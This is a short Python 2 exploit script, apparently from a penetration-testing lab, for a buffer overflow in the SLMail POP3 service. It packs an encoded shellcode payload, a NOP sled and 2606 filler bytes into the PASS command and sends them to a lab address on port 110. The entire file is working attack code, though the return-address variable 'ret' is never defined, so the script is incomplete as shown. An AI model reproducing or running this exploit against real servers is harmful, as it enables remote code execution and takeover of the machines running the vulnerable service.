source-slmail.py

import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
shellcode=("\xb8\xab\x50\x45\xc5\xd9\xce\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
"\x52\x31\x43\x12\x83\xc3\x04\x03\xe8\x5e\xa7\x30\x12\xb6\xa5"
"\xbb\xea\x47\xca\x32\x0f\x76\xca\x21\x44\x29\xfa\x22\x08\xc6"
"\x71\x66\xb8\x5d\xf7\xaf\xcf\xd6\xb2\x89\xfe\xe7\xef\xea\x61"
"\x64\xf2\x3e\x41\x55\x3d\x33\x80\x92\x20\xbe\xd0\x4b\x2e\x6d"
"\xc4\xf8\x7a\xae\x6f\xb2\x6b\xb6\x8c\x03\x8d\x97\x03\x1f\xd4"
"\x37\xa2\xcc\x6c\x7e\xbc\x11\x48\xc8\x37\xe1\x26\xcb\x91\x3b"
"\xc6\x60\xdc\xf3\x35\x78\x19\x33\xa6\x0f\x53\x47\x5b\x08\xa0"
"\x35\x87\x9d\x32\x9d\x4c\x05\x9e\x1f\x80\xd0\x55\x13\x6d\x96"
"\x31\x30\x70\x7b\x4a\x4c\xf9\x7a\x9c\xc4\xb9\x58\x38\x8c\x1a"
"\xc0\x19\x68\xcc\xfd\x79\xd3\xb1\x5b\xf2\xfe\xa6\xd1\x59\x97"
"\x0b\xd8\x61\x67\x04\x6b\x12\x55\x8b\xc7\xbc\xd5\x44\xce\x3b"
"\x19\x7f\xb6\xd3\xe4\x80\xc7\xfa\x22\xd4\x97\x94\x83\x55\x7c"
"\x64\x2b\x80\xd3\x34\x83\x7b\x94\xe4\x63\x2c\x7c\xee\x6b\x13"
"\x9c\x11\xa6\x3c\x37\xe8\x21\x49\xc3\xf2\x9c\x25\xd1\xf2\xdf"
"\x0e\x5c\x14\xb5\x60\x09\x8f\x22\x18\x10\x5b\xd2\xe5\x8e\x26"
"\xd4\x6e\x3d\xd7\x9b\x86\x48\xcb\x4c\x67\x07\xb1\xdb\x78\xbd"
"\xdd\x80\xeb\x5a\x1d\xce\x17\xf5\x4a\x87\xe6\x0c\x1e\x35\x50"
"\xa7\x3c\xc4\x04\x80\x84\x13\xf5\x0f\x05\xd1\x41\x34\x15\x2f"
"\x49\x70\x41\xff\x1c\x2e\x3f\xb9\xf6\x80\xe9\x13\xa4\x4a\x7d"
"\xe5\x86\x4c\xfb\xea\xc2\x3a\xe3\x5b\xbb\x7a\x1c\x53\x2b\x8b"
"\x65\x89\xcb\x74\xbc\x09\xfb\x3e\x9c\x38\x94\xe6\x75\x79\xf9"
"\x18\xa0\xbe\x04\x9b\x40\x3f\xf3\x83\x21\x3a\xbf\x03\xda\x36"
"\xd0\xe1\xdc\xe5\xd1\x23")
buffer = "A" * 2606 + ret + "\x90" * 16 + shellcode + "C"*(3500-16-4-351-2606)
try:
        print "\nSending evil buffer"
        s.connect(("10.11.11.158",110))
        data=s.recv(1024)
        s.send('USER username'+'\r\n')
        data=s.recv(1024)
        s.send('PASS ' + buffer + '\r\n')
        print('\nDone!')
except:
        print "Could not connect to POP3 server"